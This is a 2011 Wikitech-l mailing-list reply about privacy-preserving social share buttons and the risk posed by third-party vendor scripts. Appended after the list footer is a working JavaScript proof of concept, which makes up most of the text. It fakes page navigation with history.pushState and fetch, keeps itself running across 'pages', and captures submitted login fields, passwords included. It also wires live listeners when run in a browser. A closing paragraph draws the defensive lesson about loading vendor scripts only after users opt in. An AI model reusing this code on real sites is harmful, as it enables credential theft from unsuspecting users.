On Sun, 30 Oct 2011 01:12:51 -0700, Marco Schuster <[email protected]> wrote:
> On Sat, Oct 29, 2011 at 4:22 PM, Daniel Friesen
> <[email protected]> wrote:
>> - It doesn't scale very well. If you do try to add more vendors and users
>> do enable most of them, you still end up loading from each enabled vendor,
>> slowing things down.
> With the exception of the FB Like/Recommend button, everything (even
> the FB share link) is just an image paired with an HTML link. Maybe
> other sites allow embedding their logos, so the only image which needs
> to be loaded externally is the FB one.

No, both the Twitter and Google +1 share features in that socialshareprivacy are also embeds, not simple images paired with links. In fact, while FB has a static share and Twitter has its static share and intents, being the newest, +1 hasn't implemented a static share feature yet. Likely somewhat related to the separation of +1 and G+: unlike with the others, +1ing something doesn't mean you're using G+.

>> - Frankly the UI is pretty bad.
> That's the price you have to pay for total privacy, unfortunately.

No, there are other potential possibilities that don't include a bad UI.

>> - Once you enable a vendor we drop right back to a 3rd party script being
>> injected into the page such that it can do malicious things.
>>
>> Btw, if you're a 3rd party with a script in a page you can go pretty far
>> abusing XHR and history.pushState to make it look to a user like they're
>> browsing the website normally when in reality they're on the same page
>> with the script still running. Oh, and that includes making it look like
>> you're safely visiting the login page when in reality you didn't change
>> pages and the script is still running ready to catch passwords.
> Do you have any links with further info on this?
>
> Marco

I don't know of any specific links you can look at; I realized it myself after looking at pushState. It's probably known elsewhere, but I figured it out independently, so I don't know of any more detailed articles or posts on it off the top of my head.
--
~Daniel Friesen (Dantman, Nadir-Seen-Fire) [http://daniel.friesen.name]

_______________________________________________
Wikitech-l mailing list
[email protected]
https://lists.wikimedia.org/mailman/listinfo/wikitech-l
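The pushState trick Daniel describes above, written out as an added example (this is not code from the thread, from MediaWiki or from socialshareprivacy). A script that is already executing in the page intercepts clicks on same-origin links, calls history.pushState so the address bar shows the new URL, loads the real target with XHR/fetch and swaps its markup into the current document. No page load ever happens, so the script's closure, and whatever it has collected, survives across what the user perceives as several page visits, including the visit to the login page. The browser environment (history, fetch, document, location) is passed in as an `env` object so the same logic can be exercised against the constructed stand-in at the bottom; the wiki origin, the `/login` path and the form field names are all made up for the demonstration.

```javascript
// Added example: a third-party script faking navigation with pushState + XHR.
// Everything below is hypothetical; the origin, paths and field names are
// constructed for the demo and do not refer to any real site.

function sameOrigin(href, location) {
  // Only same-origin pages can be fetched and rendered in place; a link to
  // another origin has to be allowed to navigate for real or the illusion
  // (and the script) would break.
  try {
    return new URL(href, location.href).origin === location.origin;
  } catch (e) {
    return false;
  }
}

function createHijacker(env) {
  // This state lives as long as the script does, i.e. across every "page".
  const state = { navigations: 0, captured: [] };

  async function fakeNavigate(href) {
    const url = new URL(href, env.location.href);
    // 1. The address bar and history change, but the document is not unloaded.
    env.history.pushState({ fake: true }, "", url.pathname + url.search);
    state.navigations += 1;
    // 2. Fetch the genuine page. Same-origin cookies ride along, so a
    //    logged-in user sees exactly what they would normally see.
    const response = await env.fetch(url.href, { credentials: "same-origin" });
    const html = await response.text();
    // 3. Replace the visible content. The real login form is now inside a
    //    document the attacker's script still controls.
    env.document.body.innerHTML = html;
    return state.navigations;
  }

  function onClick(event) {
    const anchor = event.target && event.target.closest
      ? event.target.closest("a[href]") : null;
    if (!anchor || !sameOrigin(anchor.href, env.location)) return; // let it go
    event.preventDefault();
    fakeNavigate(anchor.href);
  }

  // Called for submissions of the swapped-in form: the fields are read before
  // the real request leaves. This is the credential-capture step.
  function onSubmit(formFields) {
    const record = {};
    for (const [name, value] of formFields) record[name] = value;
    state.captured.push(record);
    return record;
  }

  return { fakeNavigate, onClick, onSubmit, state };
}

// Browser wiring; a no-op when this file is run outside a browser.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  const hijacker = createHijacker(window);
  document.addEventListener("click", hijacker.onClick, true);
  document.addEventListener("submit", (e) => {
    hijacker.onSubmit(new FormData(e.target).entries());
  }, true);
}

// Constructed stand-in for a browser so the logic can be run offline.
function makeFakeEnv(pages) {
  const history = { entries: [], pushState(s, title, url) { this.entries.push(url); } };
  return {
    location: { origin: "https://wiki.example.test", href: "https://wiki.example.test/wiki/Main_Page" },
    history,
    document: { body: { innerHTML: "<p>Main page</p>" } },
    fetch: async (url) => ({ text: async () => pages[new URL(url).pathname] || "not found" }),
  };
}

// Scenario: the user is on the main page, the vendor script is running, and
// the user clicks "Log in". Returns what the user sees and what the script got.
async function demo() {
  const loginPage = '<form action="/login" method="post">' +
    '<input name="username"><input name="password" type="password"></form>';
  const env = makeFakeEnv({ "/login": loginPage });
  const hijacker = createHijacker(env);
  await hijacker.fakeNavigate(env.location.origin + "/login");
  const captured = hijacker.onSubmit([["username", "alice"], ["password", "hunter2"]]);
  return {
    urlBarShows: env.history.entries[env.history.entries.length - 1],
    navigations: hijacker.state.navigations,
    bodyHasLoginForm: env.document.body.innerHTML.includes('type="password"'),
    captured,
    crossOriginHijacked: sameOrigin("https://other.example/x", env.location),
  };
}
```

Nothing visible to the user distinguishes this from a real visit to the login page except a hard reload or retyping the URL, which is exactly why the thread's conclusion holds: once a vendor script executes in the page it runs with the page's own origin, so the same-origin policy and a script-src allow-list give no protection against it, and the only real control is not loading it until the user has opted in.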
